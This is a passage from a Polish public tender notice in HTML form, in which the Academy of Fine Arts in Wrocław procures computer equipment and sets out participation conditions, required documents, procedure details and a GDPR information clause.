klawiatura numeryczna).Szczegółowe warunki i zasady realizacji zamówienia określa projekt umowy (załącznik nr 4 do niniejszej SIWZ).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">38433000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30200000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213100-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych kompetencji lub uprawnień.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym 5 dni, terminie aktualnych na dzień złożenia następujących oświadczeń lub dokumentów: 1) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp; 2) W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumentów dotyczących każdego z Wykonawców, w celu wykazania braku istnienia wobec niego podstaw wykluczenia - o ile dotyczy (oryginał). W przypadku wskazania przez Wykonawcę w Formularzu oferty na ogólnie dostępne, bezpłatne, elektroniczne bazy danych, Zamawiający skorzysta z tych dokumentów dla potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 3, pobierając je samodzielnie. Jeżeli oświadczenia i dokumenty, sporządzone są w języku obcym, Wykonawca zobowiązany jest do przedstawienia ich tłumaczenia na język polski. 3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1 ppkt 1) przedkłada dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Oferta musi zawierać następujące oświadczenia i dokumenty: 1) Formularz oferty - załącznik nr 1 do SIWZ (oryginał) 2) Oświadczenie, składane na podstawie art. 25a ust. 1 ustawy Pzp dotyczące przesłanek wykluczenia z postępowania - Załącznik nr 2 do SIWZ (oryginał); 3) Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (oryginał lub notarialnie potwierdzona kopia); 4) W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub notarialnie potwierdzona kopia); Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów. 5. Dokumenty dotyczące przynależności do tej samej grupy kapitałowej (SKŁADA KAŻDY WYKONAWCA, BEZ WEZWANIA ): Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23) ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia - wg złącznika nr 3 do SIWZ (oryginał). W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu do umowy podpisanego przez obydwie strony pod rygorem nieważności i będzie dopuszczalna w granicach unormowania art. 144 i 145 ustawy Prawo zamówień publicznych.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-09-30</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Zamawiający na podstawie art. 93 ust 1a ustawy Pzp przewiduje UNIEWAŻNIENIE POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA, w przypadku nieprzyznania środków pochodzących z budżetu państwa (dotacja), które miały być przeznaczone na sfinansowanie całości lub części zamówienia.KLAUZULA INFORMACYJNA Z ART. 13 i 14 RODO W ZWIĄZKU Z PROWADZONYM POSTĘPOWANIEM O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO", Zamawiający informuje, że: ?	administratorem Pani/Pana danych osobowych jest Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu z siedzibą przy pl. Polskim 3/4, 50-156 Wrocław, tel. 71 343 80 31, adres e-mail: rector@asp.wroc.pl?	inspektorem ochrony danych osobowych w Akademii Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu jest Pan Marian Suliga, adres e-mail: iod@asp.wroc.pl, tel. 71 34 80 31 wew. 211?	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawa prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych;?	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 